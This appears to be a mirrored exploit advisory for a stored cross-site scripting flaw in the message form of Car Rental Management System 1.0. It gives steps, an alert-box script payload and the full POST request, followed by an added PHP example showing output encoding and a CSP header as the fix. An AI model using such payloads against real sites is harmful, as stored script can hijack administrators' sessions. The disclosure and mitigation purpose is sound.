Car Rental Management System 1.0 Cross Site Scripting ≈ Packet Storm – Digitalmunition





Published on August 5th, 2020


# Exploit Title: Car Rental Management System v1.0 – Persistent Cross-Site Scripting (Unauthenticated)
# Exploit Author: Adeeb Shah (@hyd3sec)
# Date: August 3, 2020
# Vendor Homepage: https://projectsworld.in/
# Software Link: https://projectworlds.in/free-projects/php-projects/car-rental-project-in-php-and-mysql/
# Version: 1.0
# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4

# Vulnerability Details
# Description: A persistent cross-site scripting vulnerability exists within the ‘message’ parameter in the message admin function.
# This example allows an unauthenticated user to inject JavaScript code that is stored by the application and will be triggered by any admin who logs into the admin console.

#Steps:

1. Navigate to http://HOST/car-Rental-syatem-PHP-MYSQL-master/message_admin.php (message_admin.php page)

2. In message form enter <script>alert("hyd3sec")</script>

3. Click Send Message

4. When an admin logs into the admin console now, the XSS will be triggered

POST /car-Rental-syatem-PHP-MYSQL-master/message_admin.php HTTP/1.1
Host: 192.168.222.132
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.222.132/car-Rental-syatem-PHP-MYSQL-master/message_admin.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Connection: close
Cookie: PHPSESSID=17icjb6fd26q9gm1ohj9c9ht5i
Upgrade-Insecure-Requests: 1

message=%3Cscript%3Ealert%28%22hyd3sec%22%29%3C%2Fscript%3E&send=Send+Message
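
The mitigation for this class of bug is to encode the stored message at the point where it is written into the admin page. The following is an added example, not code from the application or the advisory; the row layout, the function names and the CSP value are assumptions.

```php
<?php
// Added example: hypothetical admin-console rendering code, not taken from the
// Car Rental Management System source. Field and function names are assumptions.

// Constructed sample of rows as they would come back from the message store,
// including the value submitted in the request above.
$storedMessages = [
    ['id' => 1, 'message' => 'Is the sedan available on Friday?'],
    ['id' => 2, 'message' => '<script>alert("hyd3sec")</script>'],
];

// Vulnerable pattern: the stored value is concatenated into HTML unchanged,
// so the browser parses the <script> element when an admin opens the page.
function renderRowUnsafe(array $row): string
{
    return '<tr><td>' . $row['id'] . '</td><td>' . $row['message'] . "</td></tr>\n";
}

// Hardened pattern: encode at output time for the HTML context the value
// lands in. ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces
// invalid byte sequences instead of returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderRowSafe(array $row): string
{
    return '<tr><td>' . (int) $row['id'] . '</td><td>' . h($row['message']) . "</td></tr>\n";
}

// Defence in depth: a restrictive CSP keeps inline script from executing
// even if one output path is missed. Only sent when served over HTTP.
if (PHP_SAPI !== 'cli' && !headers_sent()) {
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
}

foreach ($storedMessages as $row) {
    echo "unsafe: " . renderRowUnsafe($row);
    echo "safe:   " . renderRowSafe($row);
}
```

Encoding belongs at every place the message is rendered, since rows already stored before the fix still contain raw markup.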
